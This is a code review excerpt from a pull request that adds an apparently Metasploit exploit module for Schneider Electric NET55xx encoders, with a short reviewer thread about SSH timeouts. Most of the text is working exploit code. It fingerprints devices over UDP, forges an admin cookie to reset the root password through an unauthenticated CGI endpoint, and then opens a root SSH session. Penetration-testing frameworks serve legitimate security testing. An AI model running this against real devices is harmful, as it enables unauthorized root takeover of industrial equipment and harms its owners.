modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb

```diff
@@ -0,0 +1,188 @@
+    connect_udp(true, {'RPORT' => datastore['UDP_PORT']})
+    udp_sock.put(xmlPayload)
+    resp = []
+    resp << udp_sock.get(datastore['TIMEOUT'])
+    xmlResponse = resp.join(',')
+    disconnect_udp
+
+    if xmlResponse.include? "NET5501" or xmlResponse.include? "NET5501-I" or xmlResponse.include? "NET5501-XT" or xmlResponse.include? "NET5504" or xmlResponse.include? "NET5500" or xmlResponse.include? "NET5516" or xmlResponse.include? "NET5508"
+       return Exploit::CheckCode::Appears
+    end
+       return Exploit::CheckCode::Safe
+  end
+
+  def change_password
+    print_status("#{rhost}:80 - Attempt to change the root password...")
+    headers = {}
+    headers['Cookie'] = 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647'
+    headers['Content-Type'] = 'application/json;charset=utf-8'
+    headers['Connection'] = 'keep-alive'
+    headers['Accept'] = 'application/json, text/plain, */*'
+    headers['Accept-Language'] = 'en-US,en;q=0.5'
+    headers['Accept-Encoding'] = 'gzip, deflate, br'
+    headers['Cache-Control'] = 'no-cache'
+    headers['Pragma'] = 'no-cache'
+    headers['Content-Lenght'] = '47'
+    headers['Referer'] = normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh?timestamp=1544700034214')
+    headers['User-Agent'] = datastore['USER_AGENT']
+
+    post = "{\"enable\":true,\"passwd\":\"#{new_password}\",\"userid\":\"root\"}"
+    login = send_request_cgi({
+      'method' => 'POST',
+      'uri' =>  normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh?timestamp=1544700034214'),
+      'data' => post,
+      'headers' => headers,
+    }, timeout=datastore['TIMEOUT'])
+
+    if !login or login.code != 200
+      fail_with(Failure::UnexpectedReply, "Failed to change root password")
+    end
+    print_good("#{rhost}:80 - Successfully changed the root password...")
+    end
+
+  def do_login
+    print_status("#{rhost}:22 - Attempt to start a SSH connection...")
+    change_password
+    factory = ssh_socket_factory
+    opts = {
+      :auth_methods    => ['password', 'keyboard-interactive'],
+      :port            => 22,
+      :use_agent       => false,
+      :config          => true,
+      :password        => new_password,
+      :proxy           => factory,
+      :non_interactive => true,
+      :verify_host_key => :never
+    }
+
+    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+
+    begin
+      ssh = nil
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        ssh = Net::SSH.start(rhost, 'root', opts)
+      end
```

Comment:
`Net::SSH.start` has a timeout option available. Could this loop be removed and the `:timeout` option be set in the `opts` hash above?

Reply:
I think that's just the connect timeout. There's also authentication, etc. I could be wrong.

Reply:
@space-r7 I was not able to make it work setting :timeout in the opts hash

Reply:
Alrighty, thanks for trying it out! :)